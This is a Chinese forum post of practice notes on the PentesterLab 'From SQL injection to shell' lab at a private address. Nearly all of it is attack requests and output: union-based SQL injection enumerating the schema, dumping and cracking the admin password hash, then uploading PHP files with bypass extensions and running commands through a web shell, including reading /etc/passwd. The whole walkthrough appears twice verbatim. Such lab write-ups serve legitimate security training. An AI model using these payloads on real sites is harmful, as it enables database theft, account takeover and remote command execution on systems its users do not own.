-
-
[旧帖] [原创]From_mysql_to shell渗透平台练习笔记 0.00雪花
-
发表于: 2015-1-28 14:00
-
From_mysql_to shell渗透平台练习笔记
http://192.168.128.128/
http://192.168.128.128/cat.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
telnet 192.168.128.128 80
http://192.168.128.128/cat.php?id=2%20order%20by%203#
显示正常
http://192.168.128.128/cat.php?id=2%20order%20by%204#
显示正常
http://192.168.128.128/cat.php?id=2%20order%20by%205#
Unknown column '5' in 'order clause'
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4
显示所有页面
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5
The used SELECT statements have a different number of columns
http://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4
显示所有页面,但是没有user()等信息
http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()
显示所有页面,但是没有user()等信息
http://192.168.128.128/cat.php?id=1%20union%20select%201,user(),3,4
显示picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,database(),3,4
picture: photoblog
http://192.168.128.128/cat.php?id=1%20union%20select%201,version(),3,4
picture: 5.1.63-0+squeeze1
http://192.168.128.128/cat.php?id=1%20union%20select%201,current_user(),3,4
picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknown column 'tablename' in 'field list'
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
picture: character_sets
CHARACTER_SETS
picture: collations
COLLATIONS
picture: collation_character_set_applicability
COLLATION_CHARACTER_SET_APPLICABILITY
picture: columns
COLUMNS
picture: column_privileges
COLUMN_PRIVILEGES
picture: engines
ENGINES
picture: events
EVENTS
picture: files
FILES
picture: global_status
GLOBAL_STATUS
picture: global_variables
GLOBAL_VARIABLES
picture: key_column_usage
KEY_COLUMN_USAGE
picture: partitions
PARTITIONS
picture: plugins
PLUGINS
picture: processlist
PROCESSLIST
picture: profiling
PROFILING
picture: referential_constraints
REFERENTIAL_CONSTRAINTS
picture: routines
ROUTINES
picture: schemata
SCHEMATA
picture: schema_privileges
SCHEMA_PRIVILEGES
picture: session_status
SESSION_STATUS
picture: session_variables
SESSION_VARIABLES
picture: statistics
STATISTICS
picture: tables
TABLES
picture: table_constraints
TABLE_CONSTRAINTS
picture: table_privileges
TABLE_PRIVILEGES
picture: triggers
TRIGGERS
picture: user_privileges
USER_PRIVILEGES
picture: views
VIEWS
picture: categories
categories
picture: pictures
pictures
picture: users
users
http://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
picture: character_set_name
CHARACTER_SET_NAME
picture: default_collate_name
DEFAULT_COLLATE_NAME
picture: description
DESCRIPTION
picture: maxlen
MAXLEN
picture: collation_name
COLLATION_NAME
picture: id
ID
picture: is_default
IS_DEFAULT
picture: is_compiled
IS_COMPILED
picture: sortlen
SORTLEN
picture: table_catalog
TABLE_CATALOG
picture: table_schema
TABLE_SCHEMA
picture: table_name
TABLE_NAME
picture: column_name
COLUMN_NAME
picture: ordinal_position
ORDINAL_POSITION
picture: column_default
COLUMN_DEFAULT
picture: is_nullable
IS_NULLABLE
picture: data_type
DATA_TYPE
picture: character_maximum_length
CHARACTER_MAXIMUM_LENGTH
picture: character_octet_length
CHARACTER_OCTET_LENGTH
picture: numeric_precision
NUMERIC_PRECISION
picture: numeric_scale
NUMERIC_SCALE
picture: column_type
COLUMN_TYPE
picture: column_key
COLUMN_KEY
picture: extra
EXTRA
picture: privileges
PRIVILEGES
picture: column_comment
COLUMN_COMMENT
picture: grantee
GRANTEE
picture: privilege_type
PRIVILEGE_TYPE
picture: is_grantable
IS_GRANTABLE
picture: engine
ENGINE
picture: support
SUPPORT
picture: comment
COMMENT
picture: transactions
TRANSACTIONS
picture: xa
XA
picture: savepoints
SAVEPOINTS
picture: event_catalog
EVENT_CATALOG
picture: event_schema
EVENT_SCHEMA
picture: event_name
EVENT_NAME
picture: definer
DEFINER
picture: time_zone
TIME_ZONE
picture: event_body
EVENT_BODY
picture: event_definition
EVENT_DEFINITION
picture: event_type
EVENT_TYPE
picture: execute_at
EXECUTE_AT
picture: interval_value
INTERVAL_VALUE
picture: interval_field
INTERVAL_FIELD
picture: sql_mode
SQL_MODE
picture: starts
STARTS
picture: ends
ENDS
picture: status
STATUS
picture: on_completion
ON_COMPLETION
picture: created
CREATED
picture: last_altered
LAST_ALTERED
picture: last_executed
LAST_EXECUTED
picture: event_comment
EVENT_COMMENT
picture: originator
ORIGINATOR
picture: character_set_client
CHARACTER_SET_CLIENT
picture: collation_connection
COLLATION_CONNECTION
picture: database_collation
DATABASE_COLLATION
picture: file_id
FILE_ID
picture: file_name
FILE_NAME
picture: file_type
FILE_TYPE
picture: tablespace_name
TABLESPACE_NAME
picture: logfile_group_name
LOGFILE_GROUP_NAME
picture: logfile_group_number
LOGFILE_GROUP_NUMBER
picture: fulltext_keys
FULLTEXT_KEYS
picture: deleted_rows
DELETED_ROWS
picture: update_count
UPDATE_COUNT
picture: free_extents
FREE_EXTENTS
picture: total_extents
TOTAL_EXTENTS
picture: extent_size
EXTENT_SIZE
picture: initial_size
INITIAL_SIZE
picture: maximum_size
MAXIMUM_SIZE
picture: autoextend_size
AUTOEXTEND_SIZE
picture: creation_time
CREATION_TIME
picture: last_update_time
LAST_UPDATE_TIME
picture: last_access_time
LAST_ACCESS_TIME
picture: recover_time
RECOVER_TIME
picture: transaction_counter
TRANSACTION_COUNTER
picture: version
VERSION
picture: row_format
ROW_FORMAT
picture: table_rows
TABLE_ROWS
picture: avg_row_length
AVG_ROW_LENGTH
picture: data_length
DATA_LENGTH
picture: max_data_length
MAX_DATA_LENGTH
picture: index_length
INDEX_LENGTH
picture: data_free
DATA_FREE
picture: create_time
CREATE_TIME
picture: update_time
UPDATE_TIME
picture: check_time
CHECK_TIME
picture: checksum
CHECKSUM
picture: variable_name
VARIABLE_NAME
picture: variable_value
VARIABLE_VALUE
picture: constraint_catalog
CONSTRAINT_CATALOG
picture: constraint_schema
CONSTRAINT_SCHEMA
picture: constraint_name
CONSTRAINT_NAME
picture: position_in_unique_constraint
POSITION_IN_UNIQUE_CONSTRAINT
picture: referenced_table_schema
REFERENCED_TABLE_SCHEMA
picture: referenced_table_name
REFERENCED_TABLE_NAME
picture: referenced_column_name
REFERENCED_COLUMN_NAME
picture: partition_name
PARTITION_NAME
picture: subpartition_name
SUBPARTITION_NAME
picture: partition_ordinal_position
PARTITION_ORDINAL_POSITION
picture: subpartition_ordinal_position
SUBPARTITION_ORDINAL_POSITION
picture: partition_method
PARTITION_METHOD
picture: subpartition_method
SUBPARTITION_METHOD
picture: partition_expression
PARTITION_EXPRESSION
picture: subpartition_expression
SUBPARTITION_EXPRESSION
picture: partition_description
PARTITION_DESCRIPTION
picture: partition_comment
PARTITION_COMMENT
picture: nodegroup
NODEGROUP
picture: plugin_name
PLUGIN_NAME
picture: plugin_version
PLUGIN_VERSION
picture: plugin_status
PLUGIN_STATUS
picture: plugin_type
PLUGIN_TYPE
picture: plugin_type_version
PLUGIN_TYPE_VERSION
picture: plugin_library
PLUGIN_LIBRARY
picture: plugin_library_version
PLUGIN_LIBRARY_VERSION
picture: plugin_author
PLUGIN_AUTHOR
picture: plugin_description
PLUGIN_DESCRIPTION
picture: plugin_license
PLUGIN_LICENSE
picture: user
USER
picture: host
HOST
picture: db
DB
picture: command
COMMAND
picture: time
TIME
picture: state
STATE
picture: info
INFO
picture: query_id
QUERY_ID
picture: seq
SEQ
picture: duration
DURATION
picture: cpu_user
CPU_USER
picture: cpu_system
CPU_SYSTEM
picture: context_voluntary
CONTEXT_VOLUNTARY
picture: context_involuntary
CONTEXT_INVOLUNTARY
picture: block_ops_in
BLOCK_OPS_IN
picture: block_ops_out
BLOCK_OPS_OUT
picture: messages_sent
MESSAGES_SENT
picture: messages_received
MESSAGES_RECEIVED
picture: page_faults_major
PAGE_FAULTS_MAJOR
picture: page_faults_minor
PAGE_FAULTS_MINOR
picture: swaps
SWAPS
picture: source_function
SOURCE_FUNCTION
picture: source_file
SOURCE_FILE
picture: source_line
SOURCE_LINE
picture: unique_constraint_catalog
UNIQUE_CONSTRAINT_CATALOG
picture: unique_constraint_schema
UNIQUE_CONSTRAINT_SCHEMA
picture: unique_constraint_name
UNIQUE_CONSTRAINT_NAME
picture: match_option
MATCH_OPTION
picture: update_rule
UPDATE_RULE
picture: delete_rule
DELETE_RULE
picture: specific_name
SPECIFIC_NAME
picture: routine_catalog
ROUTINE_CATALOG
picture: routine_schema
ROUTINE_SCHEMA
picture: routine_name
ROUTINE_NAME
picture: routine_type
ROUTINE_TYPE
picture: dtd_identifier
DTD_IDENTIFIER
picture: routine_body
ROUTINE_BODY
picture: routine_definition
ROUTINE_DEFINITION
picture: external_name
EXTERNAL_NAME
picture: external_language
EXTERNAL_LANGUAGE
picture: parameter_style
PARAMETER_STYLE
picture: is_deterministic
IS_DETERMINISTIC
picture: sql_data_access
SQL_DATA_ACCESS
picture: sql_path
SQL_PATH
picture: security_type
SECURITY_TYPE
picture: routine_comment
ROUTINE_COMMENT
picture: catalog_name
CATALOG_NAME
picture: schema_name
SCHEMA_NAME
picture: default_character_set_name
DEFAULT_CHARACTER_SET_NAME
picture: default_collation_name
DEFAULT_COLLATION_NAME
picture: non_unique
NON_UNIQUE
picture: index_schema
INDEX_SCHEMA
picture: index_name
INDEX_NAME
picture: seq_in_index
SEQ_IN_INDEX
picture: collation
COLLATION
picture: cardinality
CARDINALITY
picture: sub_part
SUB_PART
picture: packed
PACKED
picture: nullable
NULLABLE
picture: index_type
INDEX_TYPE
picture: table_type
TABLE_TYPE
picture: auto_increment
AUTO_INCREMENT
picture: table_collation
TABLE_COLLATION
picture: create_options
CREATE_OPTIONS
picture: table_comment
TABLE_COMMENT
picture: constraint_type
CONSTRAINT_TYPE
picture: trigger_catalog
TRIGGER_CATALOG
picture: trigger_schema
TRIGGER_SCHEMA
picture: trigger_name
TRIGGER_NAME
picture: event_manipulation
EVENT_MANIPULATION
picture: event_object_catalog
EVENT_OBJECT_CATALOG
picture: event_object_schema
EVENT_OBJECT_SCHEMA
picture: event_object_table
EVENT_OBJECT_TABLE
picture: action_order
ACTION_ORDER
picture: action_condition
ACTION_CONDITION
picture: action_statement
ACTION_STATEMENT
picture: action_orientation
ACTION_ORIENTATION
picture: action_timing
ACTION_TIMING
picture: action_reference_old_table
ACTION_REFERENCE_OLD_TABLE
picture: action_reference_new_table
ACTION_REFERENCE_NEW_TABLE
picture: action_reference_old_row
ACTION_REFERENCE_OLD_ROW
picture: action_reference_new_row
ACTION_REFERENCE_NEW_ROW
picture: view_definition
VIEW_DEFINITION
picture: check_option
CHECK_OPTION
picture: is_updatable
IS_UPDATABLE
picture: title
title
picture: img
img
picture: cat
cat
picture: login
login
picture: password
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns
返回一堆信息
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns
返回一堆信息
把concat(table_name,%27:%27,column_name)评在一起
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns
返回一堆table_name和column_name信息
picture: users:id
users:id
picture: users:login
users:login
picture: users:password
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20users
picture: admin:8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%27,password),3,4%20from%20users
picture: 1:admin:8efe310f9ab3efeae8d410a8e0166eb2
在
http://www.hashkiller.co.uk/md5-decrypter.aspx
查询到
8efe310f9ab3efeae8d410a8e0166eb2 MD5 : P4ssw0rd
登陆后台,上传test1.php3
INSERT INTO pictures (title, img, cat) VALUES ('','test1.php3','1'
上传test2.php.aaa
INSERT INTO pictures (title, img, cat) VALUES ('test','test2.php.aaa','1')
页面审查元素发现,图片路径是admin/uploads
http://192.168.128.128/admin/uploads/test1.php3?cmd=ls
cthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa
http://192.168.128.128/admin/uploads/test1.php3?cmd=uname%20-a
Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
http://192.168.128.128/admin/uploads/test1.php3?cmd=whoami
www-data
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=pwd
/var/www/admin/uploads
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x
3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
http://192.168.128.128/
http://192.168.128.128/cat.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
telnet 192.168.128.128 80
http://192.168.128.128/cat.php?id=2%20order%20by%203#
显示正常
http://192.168.128.128/cat.php?id=2%20order%20by%204#
显示正常
http://192.168.128.128/cat.php?id=2%20order%20by%205#
Unknown column '5' in 'order clause'
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4
显示所有页面
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5
The used SELECT statements have a different number of columns
http://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4
显示所有页面,但是没有user()等信息
http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()
显示所有页面,但是没有user()等信息
http://192.168.128.128/cat.php?id=1%20union%20select%201,user(),3,4
显示picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,database(),3,4
picture: photoblog
http://192.168.128.128/cat.php?id=1%20union%20select%201,version(),3,4
picture: 5.1.63-0+squeeze1
http://192.168.128.128/cat.php?id=1%20union%20select%201,current_user(),3,4
picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknown column 'tablename' in 'field list'
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
picture: character_sets
CHARACTER_SETS
picture: collations
COLLATIONS
picture: collation_character_set_applicability
COLLATION_CHARACTER_SET_APPLICABILITY
picture: columns
COLUMNS
picture: column_privileges
COLUMN_PRIVILEGES
picture: engines
ENGINES
picture: events
EVENTS
picture: files
FILES
picture: global_status
GLOBAL_STATUS
picture: global_variables
GLOBAL_VARIABLES
picture: key_column_usage
KEY_COLUMN_USAGE
picture: partitions
PARTITIONS
picture: plugins
PLUGINS
picture: processlist
PROCESSLIST
picture: profiling
PROFILING
picture: referential_constraints
REFERENTIAL_CONSTRAINTS
picture: routines
ROUTINES
picture: schemata
SCHEMATA
picture: schema_privileges
SCHEMA_PRIVILEGES
picture: session_status
SESSION_STATUS
picture: session_variables
SESSION_VARIABLES
picture: statistics
STATISTICS
picture: tables
TABLES
picture: table_constraints
TABLE_CONSTRAINTS
picture: table_privileges
TABLE_PRIVILEGES
picture: triggers
TRIGGERS
picture: user_privileges
USER_PRIVILEGES
picture: views
VIEWS
picture: categories
categories
picture: pictures
pictures
picture: users
users
http://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
picture: character_set_name
CHARACTER_SET_NAME
picture: default_collate_name
DEFAULT_COLLATE_NAME
picture: description
DESCRIPTION
picture: maxlen
MAXLEN
picture: collation_name
COLLATION_NAME
picture: id
ID
picture: is_default
IS_DEFAULT
picture: is_compiled
IS_COMPILED
picture: sortlen
SORTLEN
picture: table_catalog
TABLE_CATALOG
picture: table_schema
TABLE_SCHEMA
picture: table_name
TABLE_NAME
picture: column_name
COLUMN_NAME
picture: ordinal_position
ORDINAL_POSITION
picture: column_default
COLUMN_DEFAULT
picture: is_nullable
IS_NULLABLE
picture: data_type
DATA_TYPE
picture: character_maximum_length
CHARACTER_MAXIMUM_LENGTH
picture: character_octet_length
CHARACTER_OCTET_LENGTH
picture: numeric_precision
NUMERIC_PRECISION
picture: numeric_scale
NUMERIC_SCALE
picture: column_type
COLUMN_TYPE
picture: column_key
COLUMN_KEY
picture: extra
EXTRA
picture: privileges
PRIVILEGES
picture: column_comment
COLUMN_COMMENT
picture: grantee
GRANTEE
picture: privilege_type
PRIVILEGE_TYPE
picture: is_grantable
IS_GRANTABLE
picture: engine
ENGINE
picture: support
SUPPORT
picture: comment
COMMENT
picture: transactions
TRANSACTIONS
picture: xa
XA
picture: savepoints
SAVEPOINTS
picture: event_catalog
EVENT_CATALOG
picture: event_schema
EVENT_SCHEMA
picture: event_name
EVENT_NAME
picture: definer
DEFINER
picture: time_zone
TIME_ZONE
picture: event_body
EVENT_BODY
picture: event_definition
EVENT_DEFINITION
picture: event_type
EVENT_TYPE
picture: execute_at
EXECUTE_AT
picture: interval_value
INTERVAL_VALUE
picture: interval_field
INTERVAL_FIELD
picture: sql_mode
SQL_MODE
picture: starts
STARTS
picture: ends
ENDS
picture: status
STATUS
picture: on_completion
ON_COMPLETION
picture: created
CREATED
picture: last_altered
LAST_ALTERED
picture: last_executed
LAST_EXECUTED
picture: event_comment
EVENT_COMMENT
picture: originator
ORIGINATOR
picture: character_set_client
CHARACTER_SET_CLIENT
picture: collation_connection
COLLATION_CONNECTION
picture: database_collation
DATABASE_COLLATION
picture: file_id
FILE_ID
picture: file_name
FILE_NAME
picture: file_type
FILE_TYPE
picture: tablespace_name
TABLESPACE_NAME
picture: logfile_group_name
LOGFILE_GROUP_NAME
picture: logfile_group_number
LOGFILE_GROUP_NUMBER
picture: fulltext_keys
FULLTEXT_KEYS
picture: deleted_rows
DELETED_ROWS
picture: update_count
UPDATE_COUNT
picture: free_extents
FREE_EXTENTS
picture: total_extents
TOTAL_EXTENTS
picture: extent_size
EXTENT_SIZE
picture: initial_size
INITIAL_SIZE
picture: maximum_size
MAXIMUM_SIZE
picture: autoextend_size
AUTOEXTEND_SIZE
picture: creation_time
CREATION_TIME
picture: last_update_time
LAST_UPDATE_TIME
picture: last_access_time
LAST_ACCESS_TIME
picture: recover_time
RECOVER_TIME
picture: transaction_counter
TRANSACTION_COUNTER
picture: version
VERSION
picture: row_format
ROW_FORMAT
picture: table_rows
TABLE_ROWS
picture: avg_row_length
AVG_ROW_LENGTH
picture: data_length
DATA_LENGTH
picture: max_data_length
MAX_DATA_LENGTH
picture: index_length
INDEX_LENGTH
picture: data_free
DATA_FREE
picture: create_time
CREATE_TIME
picture: update_time
UPDATE_TIME
picture: check_time
CHECK_TIME
picture: checksum
CHECKSUM
picture: variable_name
VARIABLE_NAME
picture: variable_value
VARIABLE_VALUE
picture: constraint_catalog
CONSTRAINT_CATALOG
picture: constraint_schema
CONSTRAINT_SCHEMA
picture: constraint_name
CONSTRAINT_NAME
picture: position_in_unique_constraint
POSITION_IN_UNIQUE_CONSTRAINT
picture: referenced_table_schema
REFERENCED_TABLE_SCHEMA
picture: referenced_table_name
REFERENCED_TABLE_NAME
picture: referenced_column_name
REFERENCED_COLUMN_NAME
picture: partition_name
PARTITION_NAME
picture: subpartition_name
SUBPARTITION_NAME
picture: partition_ordinal_position
PARTITION_ORDINAL_POSITION
picture: subpartition_ordinal_position
SUBPARTITION_ORDINAL_POSITION
picture: partition_method
PARTITION_METHOD
picture: subpartition_method
SUBPARTITION_METHOD
picture: partition_expression
PARTITION_EXPRESSION
picture: subpartition_expression
SUBPARTITION_EXPRESSION
picture: partition_description
PARTITION_DESCRIPTION
picture: partition_comment
PARTITION_COMMENT
picture: nodegroup
NODEGROUP
picture: plugin_name
PLUGIN_NAME
picture: plugin_version
PLUGIN_VERSION
picture: plugin_status
PLUGIN_STATUS
picture: plugin_type
PLUGIN_TYPE
picture: plugin_type_version
PLUGIN_TYPE_VERSION
picture: plugin_library
PLUGIN_LIBRARY
picture: plugin_library_version
PLUGIN_LIBRARY_VERSION
picture: plugin_author
PLUGIN_AUTHOR
picture: plugin_description
PLUGIN_DESCRIPTION
picture: plugin_license
PLUGIN_LICENSE
picture: user
USER
picture: host
HOST
picture: db
DB
picture: command
COMMAND
picture: time
TIME
picture: state
STATE
picture: info
INFO
picture: query_id
QUERY_ID
picture: seq
SEQ
picture: duration
DURATION
picture: cpu_user
CPU_USER
picture: cpu_system
CPU_SYSTEM
picture: context_voluntary
CONTEXT_VOLUNTARY
picture: context_involuntary
CONTEXT_INVOLUNTARY
picture: block_ops_in
BLOCK_OPS_IN
picture: block_ops_out
BLOCK_OPS_OUT
picture: messages_sent
MESSAGES_SENT
picture: messages_received
MESSAGES_RECEIVED
picture: page_faults_major
PAGE_FAULTS_MAJOR
picture: page_faults_minor
PAGE_FAULTS_MINOR
picture: swaps
SWAPS
picture: source_function
SOURCE_FUNCTION
picture: source_file
SOURCE_FILE
picture: source_line
SOURCE_LINE
picture: unique_constraint_catalog
UNIQUE_CONSTRAINT_CATALOG
picture: unique_constraint_schema
UNIQUE_CONSTRAINT_SCHEMA
picture: unique_constraint_name
UNIQUE_CONSTRAINT_NAME
picture: match_option
MATCH_OPTION
picture: update_rule
UPDATE_RULE
picture: delete_rule
DELETE_RULE
picture: specific_name
SPECIFIC_NAME
picture: routine_catalog
ROUTINE_CATALOG
picture: routine_schema
ROUTINE_SCHEMA
picture: routine_name
ROUTINE_NAME
picture: routine_type
ROUTINE_TYPE
picture: dtd_identifier
DTD_IDENTIFIER
picture: routine_body
ROUTINE_BODY
picture: routine_definition
ROUTINE_DEFINITION
picture: external_name
EXTERNAL_NAME
picture: external_language
EXTERNAL_LANGUAGE
picture: parameter_style
PARAMETER_STYLE
picture: is_deterministic
IS_DETERMINISTIC
picture: sql_data_access
SQL_DATA_ACCESS
picture: sql_path
SQL_PATH
picture: security_type
SECURITY_TYPE
picture: routine_comment
ROUTINE_COMMENT
picture: catalog_name
CATALOG_NAME
picture: schema_name
SCHEMA_NAME
picture: default_character_set_name
DEFAULT_CHARACTER_SET_NAME
picture: default_collation_name
DEFAULT_COLLATION_NAME
picture: non_unique
NON_UNIQUE
picture: index_schema
INDEX_SCHEMA
picture: index_name
INDEX_NAME
picture: seq_in_index
SEQ_IN_INDEX
picture: collation
COLLATION
picture: cardinality
CARDINALITY
picture: sub_part
SUB_PART
picture: packed
PACKED
picture: nullable
NULLABLE
picture: index_type
INDEX_TYPE
picture: table_type
TABLE_TYPE
picture: auto_increment
AUTO_INCREMENT
picture: table_collation
TABLE_COLLATION
picture: create_options
CREATE_OPTIONS
picture: table_comment
TABLE_COMMENT
picture: constraint_type
CONSTRAINT_TYPE
picture: trigger_catalog
TRIGGER_CATALOG
picture: trigger_schema
TRIGGER_SCHEMA
picture: trigger_name
TRIGGER_NAME
picture: event_manipulation
EVENT_MANIPULATION
picture: event_object_catalog
EVENT_OBJECT_CATALOG
picture: event_object_schema
EVENT_OBJECT_SCHEMA
picture: event_object_table
EVENT_OBJECT_TABLE
picture: action_order
ACTION_ORDER
picture: action_condition
ACTION_CONDITION
picture: action_statement
ACTION_STATEMENT
picture: action_orientation
ACTION_ORIENTATION
picture: action_timing
ACTION_TIMING
picture: action_reference_old_table
ACTION_REFERENCE_OLD_TABLE
picture: action_reference_new_table
ACTION_REFERENCE_NEW_TABLE
picture: action_reference_old_row
ACTION_REFERENCE_OLD_ROW
picture: action_reference_new_row
ACTION_REFERENCE_NEW_ROW
picture: view_definition
VIEW_DEFINITION
picture: check_option
CHECK_OPTION
picture: is_updatable
IS_UPDATABLE
picture: title
title
picture: img
img
picture: cat
cat
picture: login
login
picture: password
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns
返回一堆信息
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns
返回一堆信息
把concat(table_name,%27:%27,column_name)评在一起
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns
返回一堆table_name和column_name信息
picture: users:id
users:id
picture: users:login
users:login
picture: users:password
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20users
picture: admin:8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%27,password),3,4%20from%20users
picture: 1:admin:8efe310f9ab3efeae8d410a8e0166eb2
在
http://www.hashkiller.co.uk/md5-decrypter.aspx
查询到
8efe310f9ab3efeae8d410a8e0166eb2 MD5 : P4ssw0rd
登陆后台,上传test1.php3
INSERT INTO pictures (title, img, cat) VALUES ('','test1.php3','1'
上传test2.php.aaa
INSERT INTO pictures (title, img, cat) VALUES ('test','test2.php.aaa','1')
页面审查元素发现,图片路径是admin/uploads
http://192.168.128.128/admin/uploads/test1.php3?cmd=ls
cthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa
http://192.168.128.128/admin/uploads/test1.php3?cmd=uname%20-a
Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
http://192.168.128.128/admin/uploads/test1.php3?cmd=whoami
www-data
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=pwd
/var/www/admin/uploads
http://192.168.128.128/admin/uploads/test2.php.aaa?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x
3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
